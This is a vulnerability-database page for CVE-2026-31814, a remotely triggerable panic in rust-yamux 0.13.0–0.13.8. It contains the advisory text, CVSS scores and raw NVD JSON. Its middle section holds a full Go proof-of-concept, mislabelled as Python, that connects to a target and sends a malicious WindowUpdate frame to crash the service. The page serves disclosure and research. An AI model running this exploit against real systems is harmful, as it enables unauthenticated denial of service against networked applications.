CVE-2026-31814

Description

Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. From 0.13.0 to before 0.13.9, a specially crafted WindowUpdate can cause arithmetic overflow in send-window accounting, which triggers a panic in the connection state machine. This is remotely reachable over a normal network connection and does not require authentication. This vulnerability is fixed in 0.13.9.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:protocol:yamux:*:*:*:*:*:rust:*:* - VULNERABLE

libp2p/rust-yamux >= 0.13.0, < 0.13.9

Yamux 0.13.0

Yamux 0.13.1

Yamux 0.13.2

Yamux 0.13.3

Yamux 0.13.4

Yamux 0.13.5

Yamux 0.13.6

Yamux 0.13.7

Yamux 0.13.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2026-31814 PoC - Yamux WindowUpdate Arithmetic Overflow
// This PoC demonstrates sending a malicious WindowUpdate frame to trigger overflow

package main

import (
    "encoding/binary"
    "fmt"
    "net"
    "time"
)

const (
    // Yamux message types
    msgWindowUpdate = 0x02
    
    // Flags
    flagSYN      = 0x01
    flagACK      = 0x02
    flagFIN      = 0x04
    flagRST      = 0x08
)

// Create a malicious WindowUpdate frame with oversized window increment
func createMaliciousWindowUpdate(streamID uint32, windowSize uint32) []byte {
    // Frame header: version(1) + type(1) + flags(2) + streamID(4) + length(4)
    frame := make([]byte, 12)
    frame[0] = 0x01 // Version
    frame[1] = msgWindowUpdate // Type: WindowUpdate
    binary.BigEndian.PutUint16(frame[2:4], flagACK) // Flags
    binary.BigEndian.PutUint32(frame[4:8], streamID) // Stream ID
    binary.BigEndian.PutUint32(frame[8:12], 4) // Payload length
    
    // Malicious payload: oversized window increment
    payload := make([]byte, 4)
    binary.BigEndian.PutUint32(payload, windowSize) // Trigger overflow
    
    return append(frame, payload...)
}

func exploit(target string, port int) error {
    addr := fmt.Sprintf("%s:%d", target, port)
    conn, err := net.DialTimeout("tcp", addr, 10*time.Second)
    if err != nil {
        return fmt.Errorf("connection failed: %v", err)
    }
    defer conn.Close()
    
    // Step 1: Establish yamux session with SYN
    synFrame := []byte{0x01, 0x00, flagSYN, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04}
    if _, err := conn.Write(synFrame); err != nil {
        return fmt.Errorf("SYN send failed: %v", err)
    }
    
    // Step 2: Wait for ACK
    buf := make([]byte, 1024)
    conn.SetReadDeadline(time.Now().Add(5 * time.Second))
    conn.Read(buf)
    
    // Step 3: Create stream
    synWriteFrame := []byte{0x01, 0x00, flagSYN, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00}
    conn.Write(synWriteFrame)
    conn.Read(buf)
    
    // Step 4: Send malicious WindowUpdate to trigger arithmetic overflow
    // Use maximum uint32 value to maximize overflow probability
    maliciousFrame := createMaliciousWindowUpdate(1, 0xFFFFFFFF)
    fmt.Printf("Sending malicious WindowUpdate frame...\n")
    
    if _, err := conn.Write(maliciousFrame); err != nil {
        return fmt.Errorf("malicious frame send failed: %v", err)
    }
    
    fmt.Printf("Malicious frame sent. Target may panic.\n")
    return nil
}

func main() {
    target := "target-host"
    port := 8080
    
    fmt.Printf("CVE-2026-31814 PoC - Yamux Arithmetic Overflow\n")
    if err := exploit(target, port); err != nil {
        fmt.Printf("Error: %v\n", err)
    }
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-31814
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-31814
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-31814/
[4] VulDB https://vuldb.com/cve/CVE-2026-31814
[5] https://github.com/libp2p/rust-yamux/security/advisories/GHSA-4w32-2493-32g7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-31814", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:36.470", "lastModified": "2026-03-19T13:51:44.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Yamux is a stream multiplexer over reliable, ordered connections such as TCP/IP. From 0.13.0 to before 0.13.9, a specially crafted WindowUpdate can cause arithmetic overflow in send-window accounting, which triggers a panic in the connection state machine. This is remotely reachable over a normal network connection and does not require authentication. This vulnerability is fixed in 0.13.9."}, {"lang": "es", "value": "Yamux es un multiplexor de flujo sobre conexiones fiables y ordenadas como TCP/IP. Desde 0.13.0 hasta antes de 0.13.9, una WindowUpdate especialmente diseñada puede causar un desbordamiento aritmético en la contabilidad de la ventana de envío, lo que desencadena un pánico en la máquina de estados de la conexión. Esto es alcanzable remotamente a través de una conexión de red normal y no requiere autenticación. Esta vulnerabilidad está corregida en 0.13.9."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:protocol:yamux:*:*:*:*:*:rust:*:*", "versionStartIncluding": "0.13.0", "versionEndExcluding": "0.13.9", "matchCriteriaId": "86BA699D-3FED-46FB-943E-FCB96C23DDBB"}]}]}], "references": [{"url": "https://github.com/libp2p/rust-yamux/security/advisories/GHSA-4w32-2493-32g7", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}